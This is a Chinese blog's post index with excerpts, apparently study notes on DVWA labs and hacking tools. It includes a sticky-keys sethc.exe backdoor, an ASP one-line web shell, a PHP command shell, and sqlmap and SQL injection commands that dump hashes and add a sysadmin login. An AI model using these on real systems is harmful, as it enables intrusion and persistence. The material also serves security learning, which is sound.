自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

转载 嗅探器攻击原理

嗅探器(sniffer) 是利用计算机的网络接口截获目的地为其他计算机的数据报文的一种技术。它工作在网络的底层,把网络传输的全部数据记录下来. 嗅探器可以帮助网络管理员查找网络漏洞和检测网络性能.嗅探器可以分析网络的流量,以便找出所关心的网络中潜在的问题。  不同传输介质的网络的可监听性是不同的。一般来说,以太网被监听的可能性比较高,因为以太网是一个广播型的网络;FDDI Token被监听的可

2015-01-06 13:09:33 8216

转载 google search

工具。正因为google的检索能力强大,黑客可以构造特殊的关键字,使用Google搜索互联网上的相关隐私信息。通过Google,黑客甚至可以在几秒种内黑掉一个网站。这种利用Google搜索相关信息并进行入侵的过程就叫做Google Hack。搜索也是一门艺术        在我们平时使用搜索引擎的过程中,通常是将需要搜索的关键字输入搜索引擎,然后就开始了漫长的信息提取过程。其实Go

2015-01-06 13:06:32 468

转载 nc.exe

nc.exe大家也非常熟悉了吧!~之所以叫瑞士军刀,因为它的功能太多,太强大了!~(注:nc是一个在命令提示下用的,并是那种很人性话的图形界面软件!~)(1)格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 (2)格式:nc -l -p 80 讲解:监听本机的TCP80端口 (3)格式:nc -nvv -w2 -z 192.1

2015-01-06 12:55:01 2069

转载 shift

Shitf后门copy c:\windows\explorer.exe c:\windows\system32\sethc.execopy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exeattrib c:\windows\system32\sethc.exe +hattrib c:\windo

2015-01-06 12:45:44 334

转载 xp_cmd

然后sqlmap.py -r s.txt -p TextBox1   --dbs  -username -password什么的得出了sa的hash 尝试破解但是没破解出来,不想hash了,毕竟是sa权限。直接提交;exec master.dbo.sp_addlogin vgy95$,V_gy95;--;exec master.dbo.sp_addsrvrolemember vgy95,s

2014-10-15 17:02:05 312

转载 nmap 常用指令

1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统其它选项:-A 同时打开操作系统指纹和版本检测-v 详细输出扫描

2014-10-15 16:26:28 457

转载 一句话

送上一句话——————————————————————《asp》dim play'''''''''''''''''''''''''''''  play = request("08sec")  %>what's your nameexecute(play)  %>————————————————————————————《php》

2014-10-15 13:40:38 309

转载 sqlmap

以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string

2014-10-15 13:30:28 364

原创 php.sql_shell

无聊  写了一个

2014-10-09 17:13:34 269

原创 CTF要是我能参加明年的BCTF就。。。。。。。

第一个是MISC:misc其实是英文miscellaneous的前四个字母,表示杂项、混合体、大杂烩的意思。

2014-10-08 20:36:26 582

原创 识别你的浏览器。

alert(navigator.userAgent);

2014-10-08 16:47:02 275

原创 dom based xss

function test(){var str=document.getElementById("text").value;document.getElementById("t").innerHTML="testLink"}document.getElementById("t").innerHTML="testLink" 这一句是关键 上面的内容是吸纳

2014-10-08 16:07:12 417

转载 make bzImage时出现错误gcc: error: elf_i386/elf_x86_64: No such file or directory

这个问题是由于 gcc 4.6 不再支持 linker-style 架构。将arch/x86/vdso/Makefile中以VDSO_LDFLAGS_vdso.lds开头的语句的"-m elf_x86_64"替换为 "-m64"。VDSO_LDFLAGS_vdso32.lds开头所在行的"-m elf_x86" 替换为"-m32"。然后在执行make bzImage

2014-10-06 13:33:50 742

原创 Stored Cross Site Scripting (XSS)

low: <?phpif(isset($_POST['btnSign'])){ $message = trim($_POST['mtxMessage']); $name = trim($_POST['txtName']); // Sanitize message input $message = stripslashes($message);

2014-10-06 11:49:28 1087

原创 Reflected Cross Site Scripting (XSS)

low; <?phpif(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){ $isempty = true;} else { echo ''; echo 'Hello ' . $_GET['name']; echo '';

2014-10-06 11:24:11 1565

原创 File Upload PHP

自己实现的一个文件上传:

2014-10-06 11:07:58 624

转载 addslashes与mysql_real_escape_string的区别

addslashes和mysql_real_escape_string.都是为了使数据安全的插入到数据库中而进行过滤.那么这两个函数到底是有什么区别呢??我们今天来简单的看下..首先.我们还是从PHP手册入手..手册上addslashes转义的字符是单引号(')、双引号(")、反斜线(\)与NUL(NULL 字符)。mysql_real_escape_string转义的字符并没有被

2014-10-06 09:46:10 300

原创 SQL Injection --low

<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($g

2014-10-05 16:12:16 389

原创 File Inclusion -medium

<?php $file = $_GET['page']; // The page we wish to display // Bad input validation $file = str_replace("http://", "", $file); $file = str_replace("https://", "", $file);

2014-10-05 15:55:13 398

原创 File Inclusion -low

<?php $file = $_GET['page']; //The page we wish to display ?> 这是一个典型的文件包含 还是用GET获取的   在url后面就

2014-10-05 15:44:09 300

原创 Cross Site Request Forgery (CSRF)--medium

<?php if (isset($_GET['Change'])) { // Checks the http referer header if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){ // Turn requests in

2014-10-05 15:01:09 427

转载 PHP - HTTP_REFERER

http://blog.csdn.net/amonest/article/details/6432530看UCHome和ECShop源码的时候,发现经常会用到$_SERVER['HTTP_REFERER']的值。HTTP REFERER是Header的一部分,当浏览器向WEB服务器发送请求的时候,一般会带上HTTP REFERER,告诉服务器我是从哪个页面链接过来的,服务器籍此

2014-10-05 14:51:15 418

原创 Command Execution Source--medium

<?phpif( isset( $_POST[ 'submit'] ) ) { $target = $_REQUEST[ 'ip' ]; // Remove any of the charactars in the array (blacklist). $substitutions = array( '&&' => '', ';' =

2014-10-05 14:23:02 322

转载 php string 函数

addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (')双引号 (")反斜杠 (\)NULL语法addslashes(string)参数描述string必需。规定要检查的字符串。

2014-10-05 13:32:45 384

转载 PHP 获取服务器详细信息代码

获取系统类型及版本号:    php_uname()     (例:Windows NT COMPUTER 5.1 build 2600)只获取系统类型:          php_uname('s')       (或:PHP_OS,例:Windows NT)只获取系统版本号:        php_uname('r')       获取PHP运行方式:      php_sapi_

2014-10-05 12:10:10 402

原创 php_shell

cmd: <?phpif (stristr(php_uname('s'), 'Windows NT')) { echo "windows platform"; echo "";}else{ echo "linux"; echo "";}if( isset( $_GET[ 'submit' ] ) ) { $cmd=$_GET['cmd']; echo "

2014-10-05 12:02:10 316

原创 Command Execution --low

source code:

2014-10-05 11:23:47 291

转载 Ubuntu 14.04 为 root 帐号开启 SSH 登录

Ubuntu 14.04 为 root 帐号开启 SSH 登录1. 修改 root 密码sudo passwd root2. 以其他账户登录,通过 sudo nano 修改 /etc/ssh/sshd_config :xxx@ubuntu14:~$ su - rootPassword:root@ubuntu14:~# vi /etc/ssh/sshd_con

2014-10-04 12:21:13 286

转载 ubuntu14.04 开启root登陆

官网下载地址:http://www.ubuntu.com/download/desktop64位桌面版:http://www.ubuntu.com/ubuntu-releases/14.04/ubuntu-14.04-desktop-amd64.iso安装完成如需使用root身份登录,可打开终端输入以下命令:#设置root密码sudo passwd root#切换到root

2014-10-04 12:11:31 338

原创 待审核?

RTrt

2014-10-04 12:10:38 431

原创 知乎上来的图

转载来自知乎。。。

2014-10-03 12:17:29 279

原创 开博

开博

2014-10-03 11:33:23 244

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除